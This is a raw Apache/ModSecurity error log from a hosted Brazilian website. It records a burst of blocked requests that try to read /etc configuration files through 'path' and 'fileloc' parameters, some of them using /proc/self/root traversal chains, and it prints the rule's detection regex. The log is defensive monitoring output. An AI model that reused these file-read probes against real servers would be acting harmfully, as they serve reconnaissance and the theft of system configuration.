[Thu Mar 19 11:45:59.253144 2026] [:error] [pid 27293:tid 140411557287680] [client 57.141.18.75:37310] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJ_-YZRR_7pZ7nDKSKwAAA9Y"]
[Thu Mar 19 11:45:59.763450 2026] [:error] [pid 31803:tid 140411557287680] [client 57.141.18.23:37320] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJ-yqAr6etmhZHNpm1QAAAFY"]
[Thu Mar 19 11:46:01.305837 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:33166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMKMdf6f5d65gmYZR-YQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:01.308041 2026] [:error] [pid 14269:tid 140411649607424] [client 57.141.18.57:37332] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKAbLMZ6AikZjR9Vj2wAAAAs"]
[Thu Mar 19 11:46:01.308499 2026] [:error] [pid 27403:tid 140411683178240] [client 57.141.18.110:37336] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKBkFeYa1D6dYQnD3PwAAAcc"]
[Thu Mar 19 11:46:01.309445 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.27:37342] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKeoXxyEfFpUF8f8UTwAAAUg"]
[Thu Mar 19 11:46:01.692143 2026] [:error] [pid 27293:tid 140411548894976] [client 57.141.18.16:37354] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKf-YZRR_7pZ7nDKSLgAAA9c"]
[Thu Mar 19 11:46:01.955827 2026] [:error] [pid 17653:tid 140411632822016] [client 57.141.18.45:37360] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKcdf6f5d65gmYZR-YgAAAs0"]
[Thu Mar 19 11:46:02.392468 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.96:37366] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKsdf6f5d65gmYZR-YwAAAsw"]
[Thu Mar 19 11:46:02.983719 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.75:37378] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMKgkwaGbbGflqUZDKCgAAAMY"]
[Thu Mar 19 11:46:03.427982 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.70:37388] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMK9a6ubjKNq_cu4Zb0gAAA0Q"]
[Thu Mar 19 11:46:03.474282 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:32800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMK_u8EFLIOrSqIput_QAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:03.523786 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.29:37390] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMK-oXxyEfFpUF8f8UUAAAAU0"]
[Thu Mar 19 11:46:04.528299 2026] [:error] [pid 27403:tid 140411565680384] [client 57.141.18.28:37414] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMLBkFeYa1D6dYQnD3QAAAAdU"]
[Thu Mar 19 11:46:05.803649 2026] [:error] [pid 17887:tid 140411708356352] [client 57.141.18.97:37440] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMLQkwaGbbGflqUZDKDAAAAMQ"]
[Thu Mar 19 11:46:06.147269 2026] [:error] [pid 19093:tid 140411691570944] [client 57.141.18.86:37402] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMLl_V7PWP6ixUYl7DVQAAAoY"]
[Thu Mar 19 11:46:06.663661 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.70:37464] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMLuoXxyEfFpUF8f8UUgAAAVU"]
[Thu Mar 19 11:46:06.775621 2026] [:error] [pid 27403:tid 140411674785536] [client 57.141.18.78:37466] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMLhkFeYa1D6dYQnD3QQAAAcg"]
[Thu Mar 19 11:46:07.130569 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:46:07.288300 2026] [:error] [pid 30077:tid 140411616036608] [client 57.141.18.37:37478] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwML_u8EFLIOrSqIput_wAAAk8"]
[Thu Mar 19 11:46:07.347826 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.6:37480] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMLwbLMZ6AikZjR9Vj3gAAAAA"]
[Thu Mar 19 11:46:07.483621 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:32810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMLwbLMZ6AikZjR9Vj3wAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:08.091133 2026] [:error] [pid 27293:tid 140411691570944] [client 57.141.18.30:37500] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMMP-YZRR_7pZ7nDKSMAAAA8Y"]
[Thu Mar 19 11:46:08.588021 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:50052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMMNa6ubjKNq_cu4Zb1wAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:46:09.037183 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.41:37506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:46:09.443796 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.79:37542] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMMf-YZRR_7pZ7nDKSMgAAA8M"]
[Thu Mar 19 11:46:09.626973 2026] [:error] [pid 17887:tid 140411666392832] [client 57.141.18.111:37550] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMMQkwaGbbGflqUZDKDwAAAMk"]
[Thu Mar 19 11:46:09.895331 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.18:37556] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMMda6ubjKNq_cu4Zb2QAAA1Y"]
[Thu Mar 19 11:46:10.616778 2026] [:error] [pid 27403:tid 140411616036608] [client 57.141.18.53:37588] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMMhkFeYa1D6dYQnD3QwAAAc8"]
